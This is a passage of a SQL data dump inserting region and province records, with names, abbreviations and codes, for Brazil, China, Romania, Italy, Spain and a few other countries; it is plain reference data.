00:00:00',0),(133,1,30,0,'Sergipe','SER','SE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(134,1,30,0,'São Paulo','SAP','SP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(135,1,30,0,'Tocantins','TOC','TO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(136,1,44,0,'Anhui','ANH','34',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(137,1,44,0,'Beijing','BEI','11',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(138,1,44,0,'Chongqing','CHO','50',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(139,1,44,0,'Fujian','FUJ','35',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(140,1,44,0,'Gansu','GAN','62',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(141,1,44,0,'Guangdong','GUA','44',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(142,1,44,0,'Guangxi Zhuang','GUZ','45',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(143,1,44,0,'Guizhou','GUI','52',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(144,1,44,0,'Hainan','HAI','46',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(145,1,44,0,'Hebei','HEB','13',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(146,1,44,0,'Heilongjiang','HEI','23',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(147,1,44,0,'Henan','HEN','41',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(148,1,44,0,'Hubei','HUB','42',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(149,1,44,0,'Hunan','HUN','43',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(150,1,44,0,'Jiangsu','JIA','32',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(151,1,44,0,'Jiangxi','JIX','36',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(152,1,44,0,'Jilin','JIL','22',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(153,1,44,0,'Liaoning','LIA','21',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(154,1,44,0,'Nei Mongol','NML','15',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(155,1,44,0,'Ningxia Hui','NIH','64',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(156,1,44,0,'Qinghai','QIN','63',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(157,1,44,0,'Shandong','SNG','37',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(158,1,44,0,'Shanghai','SHH','31',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(159,1,44,0,'Shaanxi','SHX','61',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(160,1,44,0,'Sichuan','SIC','51',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(161,1,44,0,'Tianjin','TIA','12',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(162,1,44,0,'Xinjiang Uygur','XIU','65',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(163,1,44,0,'Xizang','XIZ','54',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(164,1,44,0,'Yunnan','YUN','53',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(165,1,44,0,'Zhejiang','ZHE','33',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(166,1,104,0,'Israel','ISL','IL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(167,1,104,0,'Gaza Strip','GZS','GZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(168,1,104,0,'West Bank','WBK','WB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(169,1,151,0,'St. Maarten','STM','SM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(170,1,151,0,'Bonaire','BNR','BN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(171,1,151,0,'Curacao','CUR','CR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(172,1,175,0,'Alba','ABA','AB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(173,1,175,0,'Arad','ARD','AR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(174,1,175,0,'Arges','ARG','AG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(175,1,175,0,'Bacau','BAC','BC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(176,1,175,0,'Bihor','BIH','BH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(177,1,175,0,'Bistrita-Nasaud','BIS','BN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(178,1,175,0,'Botosani','BOT','BT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(179,1,175,0,'Braila','BRL','BR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(180,1,175,0,'Brasov','BRA','BV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(181,1,175,0,'Bucuresti','BUC','B',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(182,1,175,0,'Buzau','BUZ','BZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(183,1,175,0,'Calarasi','CAL','CL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(184,1,175,0,'Caras Severin','CRS','CS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(185,1,175,0,'Cluj','CLJ','CJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(186,1,175,0,'Constanta','CST','CT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(187,1,175,0,'Covasna','COV','CV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(188,1,175,0,'Dambovita','DAM','DB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(189,1,175,0,'Dolj','DLJ','DJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(190,1,175,0,'Galati','GAL','GL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(191,1,175,0,'Giurgiu','GIU','GR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(192,1,175,0,'Gorj','GOR','GJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(193,1,175,0,'Hargita','HRG','HR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(194,1,175,0,'Hunedoara','HUN','HD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(195,1,175,0,'Ialomita','IAL','IL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(196,1,175,0,'Iasi','IAS','IS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(197,1,175,0,'Ilfov','ILF','IF',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(198,1,175,0,'Maramures','MAR','MM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(199,1,175,0,'Mehedinti','MEH','MH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(200,1,175,0,'Mures','MUR','MS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(201,1,175,0,'Neamt','NEM','NT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(202,1,175,0,'Olt','OLT','OT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(203,1,175,0,'Prahova','PRA','PH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(204,1,175,0,'Salaj','SAL','SJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(205,1,175,0,'Satu Mare','SAT','SM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(206,1,175,0,'Sibiu','SIB','SB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(207,1,175,0,'Suceava','SUC','SV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(208,1,175,0,'Teleorman','TEL','TR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(209,1,175,0,'Timis','TIM','TM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(210,1,175,0,'Tulcea','TUL','TL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(211,1,175,0,'Valcea','VAL','VL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(212,1,175,0,'Vaslui','VAS','VS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(213,1,175,0,'Vrancea','VRA','VN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(214,1,105,0,'Agrigento','AGR','AG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(215,1,105,0,'Alessandria','ALE','AL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(216,1,105,0,'Ancona','ANC','AN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(217,1,105,0,'Aosta','AOS','AO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(218,1,105,0,'Arezzo','ARE','AR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(219,1,105,0,'Ascoli Piceno','API','AP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(220,1,105,0,'Asti','AST','AT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(221,1,105,0,'Avellino','AVE','AV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(222,1,105,0,'Bari','BAR','BA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(223,1,105,0,'Belluno','BEL','BL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(224,1,105,0,'Benevento','BEN','BN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(225,1,105,0,'Bergamo','BEG','BG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(226,1,105,0,'Biella','BIE','BI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(227,1,105,0,'Bologna','BOL','BO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(228,1,105,0,'Bolzano','BOZ','BZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(229,1,105,0,'Brescia','BRE','BS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(230,1,105,0,'Brindisi','BRI','BR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(231,1,105,0,'Cagliari','CAG','CA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(232,1,105,0,'Caltanissetta','CAL','CL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(233,1,105,0,'Campobasso','CBO','CB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(234,1,105,0,'Carbonia-Iglesias','CAR','CI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(235,1,105,0,'Caserta','CAS','CE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(236,1,105,0,'Catania','CAT','CT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(237,1,105,0,'Catanzaro','CTZ','CZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(238,1,105,0,'Chieti','CHI','CH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(239,1,105,0,'Como','COM','CO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(240,1,105,0,'Cosenza','COS','CS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(241,1,105,0,'Cremona','CRE','CR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(242,1,105,0,'Crotone','CRO','KR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(243,1,105,0,'Cuneo','CUN','CN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(244,1,105,0,'Enna','ENN','EN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(245,1,105,0,'Ferrara','FER','FE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(246,1,105,0,'Firenze','FIR','FI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(247,1,105,0,'Foggia','FOG','FG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(248,1,105,0,'Forli-Cesena','FOC','FC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(249,1,105,0,'Frosinone','FRO','FR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(250,1,105,0,'Genova','GEN','GE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(251,1,105,0,'Gorizia','GOR','GO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(252,1,105,0,'Grosseto','GRO','GR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(253,1,105,0,'Imperia','IMP','IM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(254,1,105,0,'Isernia','ISE','IS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(255,1,105,0,'L\'Aquila','AQU','AQ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(256,1,105,0,'La Spezia','LAS','SP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(257,1,105,0,'Latina','LAT','LT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(258,1,105,0,'Lecce','LEC','LE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(259,1,105,0,'Lecco','LCC','LC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(260,1,105,0,'Livorno','LIV','LI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(261,1,105,0,'Lodi','LOD','LO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(262,1,105,0,'Lucca','LUC','LU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(263,1,105,0,'Macerata','MAC','MC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(264,1,105,0,'Mantova','MAN','MN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(265,1,105,0,'Massa-Carrara','MAS','MS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(266,1,105,0,'Matera','MAA','MT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(267,1,105,0,'Medio Campidano','MED','VS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(268,1,105,0,'Messina','MES','ME',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(269,1,105,0,'Milano','MIL','MI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(270,1,105,0,'Modena','MOD','MO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(271,1,105,0,'Napoli','NAP','NA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(272,1,105,0,'Novara','NOV','NO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(273,1,105,0,'Nuoro','NUR','NU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(274,1,105,0,'Ogliastra','OGL','OG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(275,1,105,0,'Olbia-Tempio','OLB','OT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(276,1,105,0,'Oristano','ORI','OR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(277,1,105,0,'Padova','PDA','PD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(278,1,105,0,'Palermo','PAL','PA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(279,1,105,0,'Parma','PAA','PR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(280,1,105,0,'Pavia','PAV','PV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(281,1,105,0,'Perugia','PER','PG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(282,1,105,0,'Pesaro e Urbino','PES','PU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(283,1,105,0,'Pescara','PSC','PE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(284,1,105,0,'Piacenza','PIA','PC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(285,1,105,0,'Pisa','PIS','PI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(286,1,105,0,'Pistoia','PIT','PT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(287,1,105,0,'Pordenone','POR','PN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(288,1,105,0,'Potenza','PTZ','PZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(289,1,105,0,'Prato','PRA','PO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(290,1,105,0,'Ragusa','RAG','RG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(291,1,105,0,'Ravenna','RAV','RA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(292,1,105,0,'Reggio Calabria','REG','RC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(293,1,105,0,'Reggio Emilia','REE','RE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(294,1,105,0,'Rieti','RIE','RI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(295,1,105,0,'Rimini','RIM','RN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(296,1,105,0,'Roma','ROM','RM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(297,1,105,0,'Rovigo','ROV','RO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(298,1,105,0,'Salerno','SAL','SA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(299,1,105,0,'Sassari','SAS','SS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(300,1,105,0,'Savona','SAV','SV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(301,1,105,0,'Siena','SIE','SI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(302,1,105,0,'Siracusa','SIR','SR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(303,1,105,0,'Sondrio','SOO','SO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(304,1,105,0,'Taranto','TAR','TA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(305,1,105,0,'Teramo','TER','TE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(306,1,105,0,'Terni','TRN','TR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(307,1,105,0,'Torino','TOR','TO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(308,1,105,0,'Trapani','TRA','TP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(309,1,105,0,'Trento','TRE','TN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(310,1,105,0,'Treviso','TRV','TV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(311,1,105,0,'Trieste','TRI','TS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(312,1,105,0,'Udine','UDI','UD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(313,1,105,0,'Varese','VAR','VA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(314,1,105,0,'Venezia','VEN','VE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(315,1,105,0,'Verbano Cusio Ossola','VCO','VB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(316,1,105,0,'Vercelli','VER','VC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(317,1,105,0,'Verona','VRN','VR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(318,1,105,0,'Vibo Valenzia','VIV','VV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(319,1,105,0,'Vicenza','VII','VI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(320,1,105,0,'Viterbo','VIT','VT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(321,1,195,0,'A Coru','ACO','15',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(322,1,195,0,'Alava','ALA','01',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(323,1,195,0,'Albacete','ALB','02',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(324,1,195,0,'Alicante','ALI','03',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(325,1,195,0,'Almeria','ALM','04',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(326,1,195,0,'Asturias','AST','33',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(327,1,195,0,'Avila','AVI','05',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(328,1,195,0,'Badajoz','BAD','06',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 